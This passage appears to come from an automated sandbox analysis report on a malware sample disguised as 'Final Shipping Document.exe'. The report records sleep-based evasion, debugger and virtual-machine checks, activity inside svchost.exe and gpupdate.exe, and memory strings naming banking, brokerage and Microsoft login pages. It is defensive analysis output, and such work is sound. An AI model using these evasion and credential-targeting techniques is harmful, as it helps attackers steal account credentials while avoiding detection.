            Source: C:\Windows\SysWOW64\gpupdate.exeAPI coverage: 2.5 %
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 6644Thread sleep count: 2725 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 6644Thread sleep time: -5450000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 6644Thread sleep count: 7247 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exe TID: 6644Thread sleep time: -14494000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe TID: 6972Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe TID: 6972Thread sleep time: -33000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\gpupdate.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C0DBBE
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BDC2A2 FindFirstFileExW,0_2_00BDC2A2
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C168EE FindFirstFileW,FindClose,0_2_00C168EE
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C1698F
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C0D076
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C0D3A9
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C19642
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C1979D
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C19B2B
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C15C97
            Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_02D9C390 FindFirstFileW,FindNextFileW,FindClose,5_2_02D9C390
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BA42DE
            Source: 303e-83.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 303e-83.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 303e-83.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 303e-83.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 303e-83.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 303e-83.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 303e-83.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 303e-83.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 303e-83.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: QnAcfZuONg.exe, 00000007.00000002.3889475015.000000000130F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
            Source: 303e-83.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 303e-83.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 303e-83.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 303e-83.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 303e-83.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 303e-83.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003149000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2779551203.000002183C01C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 303e-83.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 303e-83.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 303e-83.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 303e-83.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 303e-83.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 303e-83.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 303e-83.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 303e-83.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 303e-83.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 303e-83.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 303e-83.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 303e-83.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 303e-83.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 303e-83.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 303e-83.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 303e-83.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\gpupdate.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417AF3 LdrLoadDll,2_2_00417AF3
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00C1EAA2 BlockInput,0_2_00C1EAA2
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BD2622
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BA42DE
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_00BC4CE8 mov eax, dword ptr fs:[00000030h]0_2_00BC4CE8
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_01573500 mov eax, dword ptr fs:[00000030h]0_2_01573500
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_015734A0 mov eax, dword ptr fs:[00000030h]0_2_015734A0
            Source: C:\Users\user\Desktop\Final Shipping Document.exeCode function: 0_2_01571E70 mov eax, dword ptr fs:[00000030h]0_2_01571E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340634F mov eax, dword ptr fs:[00000030h]2_2_0340634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h]2_2_0332C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h]2_2_03350310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D437C mov eax, dword ptr fs:[00000030h]2_2_033D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov ecx, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h]2_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h]2_2_033D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033663FF mov eax, dword ptr fs:[00000030h]2_2_033663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]2_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]2_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h]2_2_033EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B63C0 mov eax, dword ptr fs:[00000030h]2_2_033B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332823B mov eax, dword ptr fs:[00000030h]2_2_0332823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340625D mov eax, dword ptr fs:[00000030h]2_2_0340625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332826B mov eax, dword ptr fs:[00000030h]2_2_0332826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h]2_2_0332A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336259 mov eax, dword ptr fs:[00000030h]2_2_03336259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]2_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]2_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h]2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h]2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034062D6 mov eax, dword ptr fs:[00000030h]2_2_034062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]2_2_03360124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404164 mov eax, dword ptr fs:[00000030h]2_2_03404164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404164 mov eax, dword ptr fs:[00000030h]2_2_03404164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]2_2_033F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]2_2_0332C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]2_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]2_2_034061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]2_2_03370185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]2_2_033601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
